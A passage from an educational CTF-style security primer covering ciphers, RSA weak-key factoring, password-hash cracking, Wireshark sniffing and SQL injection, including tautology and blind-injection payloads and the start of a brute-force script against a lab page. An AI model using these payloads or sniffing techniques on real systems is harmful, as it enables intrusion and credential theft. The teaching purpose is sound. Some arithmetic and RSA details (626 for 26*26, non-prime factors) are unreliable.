ASCII value. Go to: Note that the letter 'a', is in the position 97, so we simply subtract 97 to apply the overlap trick with modulo 26. Note that this trick would also work by not subtracting 97, but instead applying the modulo on 123, like in the following code: ``` def caesar_encrypt(text): result = "" # Go through each character of the text in this for loop for i in range(len(text)): # Obtain the ASCII value using ord char_position = ord(text[i]) # Add 3 to the position, as caesar does new_char_position = char_position + 3 new_char_position = new_char_position % 123 # Convert ASCII value to character and concatenate it to final result result = result + chr(new_char_position) print(result) return result def caesar_decrypt(cipher_text): result = "" # Go through each character of the text in this for loop for i in range(len(cipher_text)): # Obtain the ASCII value using ord char_position = ord(cipher_text[i]) # Substract 3 to the position, to get back original position new_char_position = char_position - 3 new_char_position = new_char_position % 123 # Convert ASCII value to character and concatenate it to final result result = result + chr(new_char_position) print(result) return result text = "picoctf" print(f"Plain Text: {text}") cipher_text = caesar_encrypt(text) print(f"Encrypted: {cipher_text}") print(f"Decrypted: {caesar_decrypt(cipher_text)}") ``` Can you explain why? Challenge: Modify the python script to be able to encrypt and decrypt upper case words. ### 6.3. Transposition ciphers In transposition ciphers, we don’t replace the letters by other symbols, but we simply change the order in which they appear on the cleartext. For example, we can decide that our encryption algorithm simply moves the letters to the right and overlaps. Let’s encrypt the word 'pico' by rotating its letters by one position to the right. clear text → p i c o encrypted text → o p i c This is a very simple kind of transposition. But you can have a map that makes more complicated transpositions. For instance, you can decide that you will encrypt a text by doing transpositions in chunks of 6 letters using the following mapping: The number indicate the position of the letters. Using that mapping, let’s encrypt the word 'pico'. Since pico only has 4 letters, we can simply use a padding to complete until 6 letters. For this example, we will use the symbol * as padding, so we have: The encrypted word is 'c*ip*o' using our arbitrarily defined mapping. Suppose we want to encrypt a long text. In that case we simply apply the same mapping each 6 characters. So far, we saw how transposition and substitution ciphers work. If they are used only by themselves, they are very easy to crack. On the other hand, if someone finds out the algorithm we use to encrypt, the encryption is broken forever! A way to improve this, is by using encryption algorithms based on a key. ### 6.4. Key ciphers There is a principle in cryptography called the Kerckhoffs’s principle that states: "A cryptosystem should be secure even if everything about the system, except the key, is public knowledge". That principle professes to overcome the fact that once the encryption algorithm is known by the enemy the encryption is broken. The solution is to use a key. One old algorithm that was used to encrypt data using a key was "Vigenere". It looks certainly stronger than the previous algorithms we learned. Even though it is easily breakable nowadays, in its time it was considered unbreakable. To understand how Vigenere works we will encrypt the cleartext: "I LOVE PITTSBURGH" First, we remove the spaces, because the Vigenere table does not have the space. However, a human can easily recognize the words of a text even if it has no spaces. We get: "ILOVEPITTSBURGH" Now, we can pick a key. For this example, we will use the key "PICOCTF". Since our text is larger than the key, we simply repeat the key several times until we get the same length in the following manner: Plaintext: ILOVEPITTSBURGH Key: PICOCTFPICOCTFP The first letter of the cleartext is paired with the first letter of the key. So, we have the pair ('I','P') Now in the vigenere table that is presented below, we use row i and column p. The cell at the intersection of the column and the row will be the encrypted letter, which in this case is X. We do the same for the rest of the letters, and we would obtain the following: Cleartext: ILOVEPITTSBURGH Key: PICOCTFPICOCTFP Encrypted text: XTQJGINIBUPWKLW Now let’s see how decryption works. Suppose we only have the key and the encrypted: Key: PICOCTFPICOCTFP Encrypted text: XTQJGINIBUPWKLW We take the first letter of the key, which is 'P', and go to that row in the vigenere table. Then in the row 'P', we find the first letter of the encrypted text, which is 'X'.The column that corresponds to 'X', is the first letter of the clear text, which in our case is 'I'. You repeat the same process for each character until you get 'ILOVEPITSBURGH'. To verify that you understand the decryption, decrypt the encrypted text "WMNZQAJ" using the key "HELLO", remember that if the key is shorter, you just repeat it. You should obtain a word you will easily recognize! Vigenere is easily broken even without a computer. Simon Singh, a famous science communicator, has a nice tool on his website for cracking Vigenere: Cracking ciphers is a field itself called cryptanalysis. Cryptanalysis and Cryptography compose bigger field called Cryptology. ### 6.5. Modern cryptography In modern cryptography exist the concept of symmetric and asymmetric cryptography. Symmetric cryptography means that you use the same key for encryption and decryption like we just did on Vigenere. In asymmetric cryptography you have two keys. One is for encryption, known as the public key, the other one is for decryption, known as the private key. Asymmetric cryptography is useful because it can be used to solve the problem of a key exchange. Additionally, it can be applied for digital signatures that provide integrity and non-repudiation. #### 6.5.1. Symmetric crypto example: AES A commonly used algorithm today for symmetric cryptography, is AES, which means "Advanced Encryption Standard". This algorithm has a combination of substitutions and transpositions using a key of fixed length. A key of fixed length means that the algorithm can only have a key with a certain size. However, AES has different versions and each version can support a key length of different sizes. The most common versions are AES 128 and AES 256, which have a key length of 128 bits and AES 256 respectively. AES algorithm is considered secure. However, the implementation can be attacked successfully if it has flaws. For example, one famous way to break AES encryption is the Padding Oracle Attack, which allows to successfully crack SSL, an encrypted protocol that was widely used to secure HTTP traffic. However, this is not a weakness of AES, but a weakness in how it is used. AES has different operation modes. We will analyze two of them to illustrate vulnerabilities that can emerge in their use. These operation modes are "ECB" and "CBC". ##### Operation mode ECB ECB means Electronic Code Book. In this operation mode we encrypt independently blocks of the clear text according to the key length. For example, if we are using AES 128, we break the clear text in chunks of 128 bits and use AES to encrypt them independently. This causes a problem because it leaks structure in the encrypted text. There is a famous example on the internet about an image of Tux (the penguin from linux) encrypted using AES in ECB operation mode: Original image: Encrypted image using AES on ECB mode: Yow can see that is easy to identify that the encrypted image contains the penguin. In other cases, this operation mode can be very bad for other reasons. Suppose you are sending an encrypted text and you know that the first 128 bits contain a name and the second 128 bits contain a date. Imagine that you are an attacker that captures some encrypted messages on different dates. Even if you do not know the key, you could be able to interchange the second block of messages to tamper the date. To understand this better let’s look at an example. Suppose you intercept a message sent on May 1, and after some days you intercept another message in on May 8. Imagine you want to make the receiver think that the second message is from May 1. You could simply replace the blue block by the red block. Another problem of ECB is that if you send the same message twice, any attacker can see that the same message is being sent again. A secure encryption algorithm should not leak any information about the message. Knowing that the same message was sent in the past can be used to learn details about the communication. It is recommended to never use ECB. ##### Operation mode CBC A more secure operation mode is CBC, which means Cipher Block Chaining. In this mode we include additional elements. The first one is the initialization vector, a random value with the same size as the key. In AES, the key size is the same as the block size. Remember that in AES we must separate the cleartext in blocks with the same size as the key. Before starting the encryption, we do XOR between the first block of cleartext and the Initialization Vector, then we begin to encrypt using AES with the key of our choice. The initialization vector is different for every message, so if we send the same message twice, it will be different due to the initialization vector. We must attach the initialization vector to the message. Another element we add in this operation mode, is that we do not encrypt blocks independently, but we use the encrypted text from one block and XOR it with the next block of cleartext we want to encrypt. Then, we use AES and the key to encrypt that result. In the following image it is shown the graphical representation of what it was just explained, note that the circle with the cross means XOR: In AES, the cleartext must be the same size as a multiple of the block size. For example, if you have a cleartext that happens to be shorter than a block, you need to add padding to the cleartext so it matches at least one block. In a case where cleartext is larger than one block, but smaller than two, you need to add padding to the cleartext until it is the same size as two blocks. In AES there is a common way of padding, which is a standard called PKCS #7. In AES 128, as we said previously, the block size is 128 bits, which is equivalent to 16 bytes. Suppose you want to encrypt the message "HELLOPICOCTF" Since that message is 12 bytes, we require to add a padding of 4 bytes to complete the size of a block. In PKCS#7 you add padding using a byte with the value of bytes you need to pad. In our example, since we need to pad 4 bytes to complete 16 bytes, we would pad like this: "HELLOPICOCTF"+"\x04\x04\x04\x04" Note that "\x" is a way to tell that in a string we want to use that exact number on a byte, even if it is not printable ASCII. Now, suppose we want to encrypt a message of 15 bytes like: "GOODBYEPICOCTF!" After we pad it using PKCS#7, the result is: "GOODBYEPICOCTF!"+"\x01" What would be the result after padding the message "BYEPICOCTF"? … If you answered: "BYEPICOCTF"+"\x06\x06\x06\x06\x06\x06" You are correct. #### 6.5.2. Asymmetric crypto example: RSA Remember that asymmetric crypto, means that we use one key for encrypting (the public key) and another key for decrypting (the private key). Suppose you want to communicate secretly with asymmetric crypto. In that case, you generate a public and private key pair. Then, give the public key to anyone that wants to send you an encrypted message. They will encrypt the message using your public key and when you receive the encrypted message, you are the only one that can decrypt it, because you are the only one that has the private key. That’s why it is called "private". Note that your public key can be of public knowledge and no one would be able to decrypt the message. If you want to send an encrypted message to someone, that person would have to give you their public key. A very widely used algorithm for asymmetric cryptography is RSA. It is called RSA because of its inventors: Ronald **R**ivest, Adi **S**hamir, and Leonard **A**dleman. To understand how it works, we will encrypt and decrypt using RSA algorithm with a public-private key pair that was generated for this example; it will seem a bit magical. After that, we will understand some concepts, learn to generate keys, and encrypt and decrypt with the generated keys. Before encrypting, you need to understand how it works the modulo operation if you do not know already. It is actually very simple. The modulo operation finds the remainder after division of one number by another. For example, 8 mod 3 = 2, because 3 fits in 8 two times, and we have a reminder of 2. Since RSA uses very basic arithmetic, we are ready to see the example. In RSA, the public key is a pair of numbers, as well as the private key. The message can be anything that we can represent as a number. In a computer, everything is a number as we know. The encrypted text, also called ciphertext, will be another number. In summary, this what we need in RSA to encrypt and decrypt: RSA public key: Is a pair of numbers (e,n) RSA private key: Is a pair of numbers (d,n) Message: m Ciphertext: c To encrypt: me mod n = c To decrypt: cd mod n = m Basically, 'd' is the private value of the private key, since 'n' is also in the public key. As you just saw, the formulas are very simple. To encrypt a message, you simply take the message to the power of 'e', and then do modulo 'n'. To decrypt, take the ciphertext to the power of 'd', and then do modulo 'n', and that would result in the original message. In this example the numbers of the keys are very small, which is insecure in real life. RSA is only secure when large values are used. By 2019, RSA is considered secure only if the key is a number that would take at least 2048 bits. Which is roughly **617 digits**. This is how it looks as a 617 digit number: `639792933441952154134189948544473456738316249934191318148092777710386387734317720754565453220777092120190516609628049092636019759882816133231666365286193266863360627356763035447762803504507772355471058595487027908143562401451718062464362679456127531813407833033625423278394497538243720583531147711992606381334677687969597030983391307710987040859133746414428227726346594704745878477872019277152807317679077071572134447306057007334924369311383504931631284042512192565179806941135280131470130478164378851852909285452011658393419656213491434159562586586557055269049652098580338507224264829397285847831630577775606888764` This is certainly a very big number. However, to understand how it works it is a good idea to use small numbers. Let’s look at an example: Public key (e,n) → (11,117) Private key (d,n) → (35,117) Message m –> 10 So far, we have a public key which has an e=11, and a private key with a d=35. Our message is 10. To encrypt 10, we do: 1011 mod 117 The result of that is 82. So, we have: 1011 mod 117 = 82 Ciphertext → 82 Now, for decrypting, we do: 8235 mod 117 = 10 Cleartext → 10 That was a bit magical. The RSA private and public key are generated with steps that make them have this property. The process of key generation is relatively simple. We only need to understand some parts of it to show our attack. Note that "In number theory, two integers a and b are said to be relatively prime, mutually prime, or coprime (also written co-prime) if the only positive integer (factor) that divides both of them is 1. Consequently, any prime number that divides one does not divide the other. This is equivalent to their greatest common divisor (gcd) being 1"[1]. The multiplicative inverse is a number that we use to multiply another number, and obtain 1 as a result. For example, in non-integer arithmetic (in RSA we only use integer arithmetic) the multiplicative inverse of 8, is 1/8, Because 8 * 1/8=1. However, in integer arithmetic we don’t have fractions. But we can have a multiplicative inverse modulo n, which means that if we have a number, multiply it by its multiplicative inverse, and take modulo n, the result will be 1. For example, the multiplicative inverse in 3 modulo 4, is 3, Why? Because if you multiply 3*3, that results in 9, and 9 modulo 4, is 1. Now you are ready to see the key generation without getting lost. This is it: - Generate two large co-prime numbers, p and q. - Find n = pq and phi = (p-1) (q-1) - Select e such that 1 < e < phi, and e is coprime of phi - Find d, which is the multiplicative inverse of e modulo phi. - The couple (e, n) is the public key - The couple (d, n) is the private key It is relatively simple! To find a multiplicative inverse, you can use the Extended Euclidean Algorithm (EEA). In google it is easy to find an online implementation of it. Remember our example in which we had these key pair? Public key (e,n) → (11,117) Private key (d,n) → (35,117) That was generated in the same manner. First, we picked two coprime numbers. The numbers of our choice were: p=13 q=9 They are coprime, because their greatest common divisor is 1. Then n=13*9=117 phi=(13-1)(9-1)=96 To pick e, we arbitrarily pick a number that is greater than 1 and less than phi, and it is coprime with phi. The number 11 complies with those requirements. So e=11 Now, to obtain 'd' applying the EEA. We can do that on this web site: We input 11 and 96 in the following manner: And the result we want is 35. Now we have: d=35 With those results, we know the private and public keys are: Public key (e,n) → (11,117) Private key (d,n) → (35,117) **Exercise**: Create your own public and private key, and use it to encrypt and decrypt a two digit number! ##### Attacking RSA RSA can be easily broken if it has a small 'n'. This does not happen often in real life, unless a programmer decides to implement their own version of RSA. A programmer should not make their own implementations of cryptography, it is a general rule to use libraries tested by industry. The security of RSA is based on the fact that there is not an efficient algorithm to factorize a large 'n', so an attacker is not able to generate the private key from the public key. In case 'n' is too small, it is possible to factorize it. We are going to see how to break RSA by recovering the private key from the public. In real life, the public key comes in a digital certificate, which is a package that contains data related to the owner of the public key along with the public key itself. Digital certificates are often encoded in base64, which is a way of encoding a binary as a printable text. The following is an example of a digital certificate encoded in base64: ``` -----BEGIN CERTIFICATE----- MIIB6zCB1AICMDkwDQYJKoZIhvcNAQECBQAwEjEQMA4GA1UEAxMHUGljb0NURjAe Fw0xOTA3MDgwNzIxMThaFw0xOTA2MjYxNzM0MzhaMGcxEDAOBgNVBAsTB1BpY29D VEYxEDAOBgNVBAoTB1BpY29DVEYxEDAOBgNVBAcTB1BpY29DVEYxEDAOBgNVBAgT B1BpY29DVEYxCzAJBgNVBAYTAlVTMRAwDgYDVQQDEwdQaWNvQ1RGMCIwDQYJKoZI hvcNAQEBBQADEQAwDgIHEaTUUhKxfwIDAQABMA0GCSqGSIb3DQEBAgUAA4IBAQAH al1hMsGeBb3rd/Oq+7uDguueopOvDC864hrpdGubgtjv/hrIsph7FtxM2B4rkkyA eIV708y31HIplCLruxFdspqvfGvLsCynkYfsY70i6I/dOA6l4Qq/NdmkPDx7edqO T/zK4jhnRafebqJucXFH8Ak+G6ASNRWhKfFZJTWj5CoyTMIutLU9lDiTXng3rDU1 BhXg04ei1jvAf0UrtpeOA6jUyeCLaKDFRbrOm35xI79r28yO8ng1UAzTRclvkORt b8LMxw7e+vdIntBGqf7T25PLn/MycGPPvNXyIsTzvvY/MXXJHnAqpI5DlqwzbRHz q16/S1WLvzg4PsElmv1f -----END CERTIFICATE----- ``` Copy that text into a text file on the webshell, and name it "weak_n_certificate". The first thing we must do to crack RSA with a weak n, is to extract the n from the certificate. Remember that n is the modulus and e is the exponent. You can use the following command to extract those values: `openssl x509 -in weak_n_certificate -text -noout` In this case, n= 4966306421059967 e= 65537 As we can see in the output of the command: ``` Certificate: Data: Version: 1 (0x0) Serial Number: 12345 (0x3039) Signature Algorithm: md2WithRSAEncryption Issuer: CN = PicoCTF Validity Not Before: Jul 8 07:21:18 2019 GMT Not After : Jun 26 17:34:38 2019 GMT Subject: OU = PicoCTF, O = PicoCTF, L = PicoCTF, ST = PicoCTF, C = US, CN = PicoCTF Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (53 bit) Modulus: 4966306421059967 (0x11a4d45212b17f) Exponent: 65537 (0x10001) Signature Algorithm: md2WithRSAEncryption 07:6a:5d:61:32:c1:9e:05:bd:eb:77:f3:aa:fb:bb:83:82:eb: 9e:a2:93:af:0c:2f:3a:e2:1a:e9:74:6b:9b:82:d8:ef:fe:1a: c8:b2:98:7b:16:dc:4c:d8:1e:2b:92:4c:80:78:85:7b:d3:cc: b7:d4:72:29:94:22:eb:bb:11:5d:b2:9a:af:7c:6b:cb:b0:2c: a7:91:87:ec:63:bd:22:e8:8f:dd:38:0e:a5:e1:0a:bf:35:d9: a4:3c:3c:7b:79:da:8e:4f:fc:ca:e2:38:67:45:a7:de:6e:a2: 6e:71:71:47:f0:09:3e:1b:a0:12:35:15:a1:29:f1:59:25:35: a3:e4:2a:32:4c:c2:2e:b4:b5:3d:94:38:93:5e:78:37:ac:35: 35:06:15:e0:d3:87:a2:d6:3b:c0:7f:45:2b:b6:97:8e:03:a8: d4:c9:e0:8b:68:a0:c5:45:ba:ce:9b:7e:71:23:bf:6b:db:cc: 8e:f2:78:35:50:0c:d3:45:c9:6f:90:e4:6d:6f:c2:cc:c7:0e: de:fa:f7:48:9e:d0:46:a9:fe:d3:db:93:cb:9f:f3:32:70:63: cf:bc:d5:f2:22:c4:f3:be:f6:3f:31:75:c9:1e:70:2a:a4:8e: 43:96:ac:33:6d:11:f3:ab:5e:bf:4b:55:8b:bf:38:38:3e:c1: 25:9a:fd:5f ``` Factorizing that n is easy. If you google "integer factorization online", the first result is this one: Input the value of n in the text field on that website, and click the button factor. You will get the following: That is correct, 67867967 and 73176001 happen to be 'p' and 'q' in the RSA public key. Having those to values, you are be able to calculate the private key. **Challenge**: what is the private key? #### 6.5.3. Hashing Imagine you want to download a big file from the internet. However, after downloading, you want to check that every bit of the file is correct, and nothing was changed because of a transmission error or a malicious attacker. To do this, you can use a hash, which is a value that you get after applying a hash function to the file, and you obtain a string of fixed length that identifies that file. Whenever you apply the hash function to the file, you will get exactly the same hash, unless the file has been modified. If one bit of the file was changed, you would get a very different hash. So, using a hash we can check the integrity. There are several hash functions used in industry that are considered secure. One that is commonly used, is SHA2, which means "Secure Hashing Algorithm 2", because it is the second version of SHA. Let’s look at an example. Open the webshell and create a file called "bio.txt" and copy paste the following content (do not include the quotes and make sure there is not break line at the end or beginning): "Charles Babbage KH FRS (26 December 1791 – 18 October 1871) was an English polymath. A mathematician, philosopher, inventor and mechanical engineer, Babbage originated the concept of a digital programmable computer." Save it, and run the command "sha256sum" like this: `sha256sum bio.txt` As a result, you should get a hex string of 64 characters. In this particular text, you should get: `338f1cefc564f86ecfc241310d35e31125bb14cff61c080f293be2ef24fb3a69` That string is an identification for the information contained in our file. If we make just a little change to the file, it will change completely. For example, create a new file called "bio2.txt" with the same data, but now without the dot at the end: "Charles Babbage KH FRS (26 December 1791 – 18 October 1871) was an English polymath. A mathematician, philosopher, inventor and mechanical engineer, Babbage originated the concept of a digital programmable computer" Save it, and run the command "sha256sum" like this: sha256sum bio2.txt You should get: 3e7e604c81440507f6140becfed1c3510bc49cc4745c938166b9979245215618 Note that the hash is very different just because we removed one single dot. Now, add the dot back at the end in the file bio2.txt, and run "sha256sum" on that file. You should get the original hash that we got from "bio.txt", because the information contained in the file is the same. If we store a file, calculate the hash, and keep the hash with us, we could know if the file was modified by recalculating the hash and verifying that it matches with the hash we had. This is a very useful integrity measure. One caveat, is that an attacker should not have access to the place in which the hash is stored, because in that case, the attacker would be able to modify the file, recalculate the hash, and replaced the stored hash, so we would not be able to tell that the file was modified. Hashes are commonly used to store passwords in a database. When a user logs in, the hash of the password is calculated, and it is compared with the hash stored. If they match, we know that the user input the correct password. Note that a fundamental property of hashes is that it is impossible to get the original text from the hash. Because of this, a system administrator would not be able to learn the actual password of users if they have access to the database. In the case of a data breach, when a database is leaked, attackers would not be able to obtain the real password of users. How can a hash be attacked? In the case of passwords, an attacker can create a table that maps several passwords to their hash by calculating the hash of several words, for example all the words in an english dictionary. In that way, if the attacker finds a hash of the password in the database, and the password was a word present in an english dictionary, it could be possible to map it back to the original password by looking for it in the table. However, if a user picked a secure password, this attack would not work because that secure password with complexity, would not be in a dictionary. Note there are lists of commonly used passwords which contain words in several languages and modifications of them, for example, "Hello_12345". A secure password should be random characters to prevent this attack. Challenge: The following hash of a password was leaked from a database, and you know the user did not use a strong password. cd0894152aa5eec36ec79eb2bcb90ca40f056804530f40732b4957a496b23dc8 Search on google the list of passwords called "rockyou" and generate the hash to find the password that corresponds to the leaked hash! Hint: you can use python to generate hashes. The hashing algorithm is SHA256. ## 7. The Network ##### Samuel Sabogal Pardo A network is made up of several computers connected. They can be connected through different protocols. A Protocol is a set of rules that allow two computers in a network to send and receive information. That set of rules is essential to understand what information is coming from what source, or how to send information to a particular computer in the network. To sniff traffic in a network, we will be using a tool called Wireshark, which can show the packets transmitted on a network and we can get passwords from insecure connections. But first, we will briefly explain some important things so you roughly understand the composition of a packet and can extract the parts you need. When you access a browser and visit a web site, the information of the web site is downloaded in packets. Today’s Internet is fast, and you might feel that the website appears all at once. But if you download a big file, you can see that it takes some time. This happens because the file is broken down into packets that are received in your computer, and begin to accumulate, until they are all received and conform the whole file when the download is completed. Each packet contains a piece corresponding to each layer. Review the layers here: Network Layers. ### 7.1. Sniffing and attack example In a tool called Wireshark, we can “sniff” the packets transmitted on a network. The technical term that is used to refer to a tool like Wireshark is “sniffer”. Go here for instructions on installing Wireshark if you have not already: Installing Wireshark. Once you install and open it you should see a window similar to this: That is the list of devices you can sniff. In this case, we want to sniff the network card you are using to connect to the internet. If you are connected to a WiFi, you should select the one that is called “WiFi”. In case you are connected to the Internet using Ethernet cable, you should select “Ethernet”. Then, click the “start capture” button on the upper left side which is circled in the following image: The capture now starts. If you have applications running on your computer or have website open in your browser, you will probably see several packets immediately, let the Wireshark window continue to run the packet sniffing. In your browser, navigate to the following link: You should see the following page: Now come back to the Wireshark window. What we want to do now is finding the packets that were sent and received in your computer when you accessed the link. If there are too many packets from all the connections on your computer, this task would be too hard task without the help of a Wireshark filter. A Wireshark filter allows you to tell Wireshark that you only want to see some specific packets. You can filter by protocol, IP, strings present in your request, or anything you need that helps you find what you are looking for faster. When we accessed the link on the browser, we did an HTTP request. We can filter HTTP requests, by simply typing http on the filter textfield and pressing enter. The following image shows the results and we circled in red the textfield in which you have to type: Right below the textfield in which you typed is the packet list. We can see two packets. The first one is the request your browser sent to the server asking for the web page, so naturally it has your IP as the source, and the IP of the server as the destination. The second packet is the reply, which now has your IP as the destination and the IP of the server as the source because now the server is the one that is sending the page to you after you request it. In the lower part of the window, we can see the information related to all the layers we explained previously of the currently selected packet. Now, we will send a user and password to the web site. This page in particular does not do anything after you send a password, it just receives it, but the important thing is to note that we can see the password on wireshark when we send it. In the web page, type the following in user and password respectively: picouser picopassword In Wireshark, you should see now two more packets, one in which you send the user and password, and the reply of the server. Note that the reply of the server is the same page, as we said this page does nothing. So far, we have 4 packets, and the third one is the one in which you send the user and password! Click the third packet, and in the lower part of the window where the layers are visible, click “Hypertext Transfer Protocol”. Note that at the end we can see &password=picopassword We just found the password we sent using sniffing. A fundamental thing to note, is that we were able to do that because the website was using HTTP, instead of HTTPS which is encrypted. Encryption prevents us from understanding the contents of a packet. Additionally, we are always able to sniff the network card of our own computer. However, if we want to sniff packets from other devices connected to the same WIFI, we must do additional things because WiFi could be using encryption. We encourage you to use a second device, it can be a smartphone, to access the web page and send a password. Then in your computer use Wireshark to capture the password sent, but first you need to do two things: Enable monitor mode in Wireshark: Stop any packet capture you are doing and open the capture dialog, which is located in the upper part of the window and click “options”Choose Wifi Interface and check “monitor” as in the following image: When the monitor mode is enabled and you are capturing packets, you would not be able to navigate the Internet on your computer. To be able to navigate again, disable monitor mode by unchecking the checkbox. | Decrypt WiFi connection: You can do this only if you have the password for the WiFi you are sniffing. In the following link there is a very good article that explains how to do it: Note that WIFI encryption is encryption of the datalink layer, which is different to the encryption provided by HTTPS which is in the application layer. Even if you decrypt the WIFI connection, if a website is using HTTPS, you will not be able to see anything from that website on Wireshark. ## 8. Infiltrating in a database ##### Samuel Sabogal Pardo ### 8.1. SQL SQL is used to create and manipulate a very common type of databases called relational databases. SQL stands for Structured Query Language. With it you can create tables in a database, store data on them, and run different queries that let you extract and analyze data. We are going to see some examples in a relational database management system (RDBMS) called MySQL. Once you learn the basics of SQL in any RDBMS, it is easy to apply them in others. We are going to see a very quick introduction so you are able to understand the hacks. Let’s begin. As we said, information is stored in tables. The following is an example of a table that we might call "user": Id | Name | Last Name | Phone | Password | ---|---|---|---|---| 1 | Jane | Doe | 200 111 1111 | 123456 | 2 | Arpit | Gupta | 200 111 1111 | hello | 3 | Melania | Clinton | 201 333 3333 | password | The passwords in this table are just an example. In real life, you should never store the password directly in the database, as you will learn in the crypto section. Additionally, you should never use a password like those, they are too weak. | There are several online tools that you can easily find on Google to learn languages. For example, access the following web site: We can execute MySQL statements online. So, let’s create our table from the previous example on it. First, delete the code present in the editor. You should be seeing something like this: Now, you can create the table using the following statement: create table user (id integer, name text, lastname text, phone text, password text); Analyze the statement carefully. This statement creates a table called "user" with five columns. The first column is "id", and has the data type int, which means integer. The other columns are "name", "lastname", "phone", and "password", which are of datatype text. In datatype integer, as you might guess, you can only store integers. In a datatype text, you can store strings. Put that statement in the SQL editor and hit the button "Run". If it was successful, you will see a green bar on top of the editor with the label "success". When you create tables in SQL, they are stored and become available to insert future data on them. However, in this online editor tables just survive in a single run, so in the same script we will have to create the table, insert the data, and query the data. So far we have created the table but it is empty. To insert a row, add the following statement: insert into user (id, name, lastname, phone, password) values (1, 'Jane', 'Doe', '200 111 1111', '123456'); As you can see, the statement is self explanatory. It will insert each of those values in each column of user conforming a new row. Hit run, and verify it was successful. It should look like this: Now, add the following line that will query the data you have inserted so far: select * from user; The * means that you want to see the content of all the columns. Hit Run. You can see the results at the end. Now insert the two rows missing to conform our 3 row table: If you are interested in returning only some particular columns, you can list them instead of using the *. For example, let’s return only the name and lastname: select name, lastname from user; You will see: We can make our query more granular if we add a "where" clause like this: select * from user **where id=2**; Look at the query carefully. We already know that the * means we want to see the content of every column. In the 'where' clause we restrict which rows we want to return. What row do you think is going to return that query? If you thought about this row: 2 | Arpit | Gupta | 200 111 1111 | hello | You were right. That is because that row is the one with the value of 2 in its id. You could filter by any other field. If you are filtering a field of type text, you have to enclose the value in single quotes. Remove the previous select statement, and add: select * from user where phone='200 111 1111' ; You should be seeing the following: Run it. If you look at the rows inserted. 'Jone Doe' had the same phone number as 'Arpit Gupta'. The select statement should return 2 rows like this: We can also filter by two fields in the same query using the logical operator 'and' in the following manner: select * from user where phone='200 111 1111' and name='Jane'; After the "where" clause, you can put several boolean expressions. As you learned previously in the programming chapter, when you use "and" it means that both expressions have to be true so the expression is true. The query should return this: Now, add another 'and' operator, to try to filter using a name that does not exist in the table: select * from user where phone='200 111 1111' and name='Jane' and name='Mario'; The query should return no results, because 'Mario' does not exist in our database: Now, as an experiment add another filter, but this time use "or" instead of "and". For example, run: select * from user where phone='200 111 1111' and name='Mario' or name='Arpit'; You will see: What happened here? Analyze the query carefully. You know there is no one called Mario in our table. Why in the world does the query return a row? If you think about it, any expression, no matter how long it is, if results in False, but then you do "or" with something that is true, it will be true. For example: 1=2 and 3=2 and 47=1 or 1=1 Will be true, because (1=2 and 3=5 and 45=1) is false, but (1=1) is true. This is fundamental for the basic SQL injection attack. Try the following: select * from user where phone='200 111 1111' and name='Mario' **or 1=1**; You just returned all the results! That happens, as you might guess, because "1=1" is always true. As an exercise, create a new table with new data and create new queries. ### 8.2. Basic SQL injection The objective of the basic SQL injection we are learning is to try to inject an "or" expression that is always true. In that way the server code constructs a query using the user input that deceives the program into it returning the whole table. That happens when a program is concatenating strings to construct a query in the server code. The following is an example in PHP: "SELECT * FROM user where name='".$name.""' and password='".$password.""';" The green part of the query will be concatenated with the value of the variables to form the final query. Let’s suppose that $name is equal to "samuel", and $password is equal to "hello", the query would result in SELECT * FROM user where name='samuel' and password='hello'; What would happen if the password contains a single quote? That might break the syntax of the SQL query. Even worse, it could be used to inject your own sql. For example, if the value of $password is: **' or '1'='1** The resultant query would be: SELECT * FROM user where name='samuel' and password='' **or '1'='1**'; Which is a perfectly valid query that will return the whole table. Use what you just learned here to return all the users: This kind of vulnerability is rarely present in applications. One that is more common, is the blind sql injection. ### 8.3. Blind SQL injection In this kind of vulnerability, the application does not return all the data to you. However, it is enough that the application shows an error message saying that no data was found or that an error has occurred, to figure out the content we are looking for. To illustrate this, we are going to attack the following page: If we input our previous injection in the password field: **' or '1'='1** We will see that the application found something and shows the message "REGISTER FOUND": Internally, the injection deceives the application into returning records, but the application did not show us those records. That’s why it is called Blind SQL injection. We can inject SQL, but we cannot see the result! What can we do about this? We will try to inject a SQL to guess one character of a field at a time. Suppose we want to guess the first character of the password. If we don’t guess it, the application will return "NOTHING FOUND". If we guess it, it will return "REGISTER FOUND". Note, this is fundamental to be able to guess only one character at a time. Trying to guess a whole string at the same time, is much harder. Suppose a word is made up by a combination of the 26 characters of the alphabet. To guess only the first letter, we only have to try 26 values. However, if we try to guess the whole word, is much more complicated. To illustrate this, suppose we have a word of two letters. If we can guess one at a time, we will need at most 26 trials for the first one, and 26 trials for the second one, for a total of 52 trials. On the other hand, if we try to guess both letters at a time, we will need 26*26 trials, which is 626 trials, because they can have different combinations. If we add more characters, guessing the whole word becomes much harder because it would emerge too many possible words. Nonetheless, guessing one letter at a time, will keep being only 26 trials for each letter. The blind SQL injection is based on that fact, it will try to inject a query that only compares one character at a time. To be able to do that, you need to know the name of the column you are trying to guess. This is not that hard, because in many cases you can infer the name of the database column based on the name of the html input. In other cases, you can leak the name if an error occurs inside the application, and in the error message the application shows the value of the columns. For the page we are attacking in this example the names are the same as the html input. One column is called 'username', and the other one is called 'password'. So far, you know that if you inject: **' or '1'='1** It will return results, but you are not learning any information. We know two column names, 'username' and password. For this example, suppose you know a user called 'picoctf' and you want to get the password from that user. To narrow down the query to the row in which the user 'picoctf' information is stored, you could use: **' or username='picoctf** Note that we do not use the **'1'='1** anymore because we want a statement that will filter only one user. If you inject this on the password field from the web page, you will still see: Remember that in our injection, if the part at the right of the "or" is true, it will return results. It is true that username is equal to 'picoctf' only in the row on the picoctf! Now we will add the part that compares the first character of the password. We can do that using an embedded query. An embedded query is a query inside a query. Our embedded query highlighted in green, will simply return the first character of the password. We will compare that first character with the character 'a', so we are guessing that the first character is 'a': **' or username='picoctf' and (select substr(password, 1, 1))='a** If you inject this, you will see that nothing is found: This is because we did not guess the first character. If you keep trying different characters, you will find that the first character of the password is 'f', when you inject this: **' or username='picoctf' and (select substr(password, 1, 1))='f** And see as a result this: You could possibly find the whole password manually, but it would take too much effort. On the other hand, you may want to obtain all the passwords in the database, or even all the fields from the database! This same process can be applied for any field… In most of the SQL engines there is a system table that contains the names of all tables and columns, so once we find a SQL injections databases we might be able to leak the whole database. For this exercise we will only obtain one password. To be more efficient, we will write a python script that does the job for us. Suppose we found the name of the table in some way. The script is the following: ``` import requests from string import printable accum = "" for i in range(40): for letter in printable: accum += letter r = requests.post("https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '" + letter +"'=( select substr(binary password,"+str(i)+",1) from pico_blind_injection where 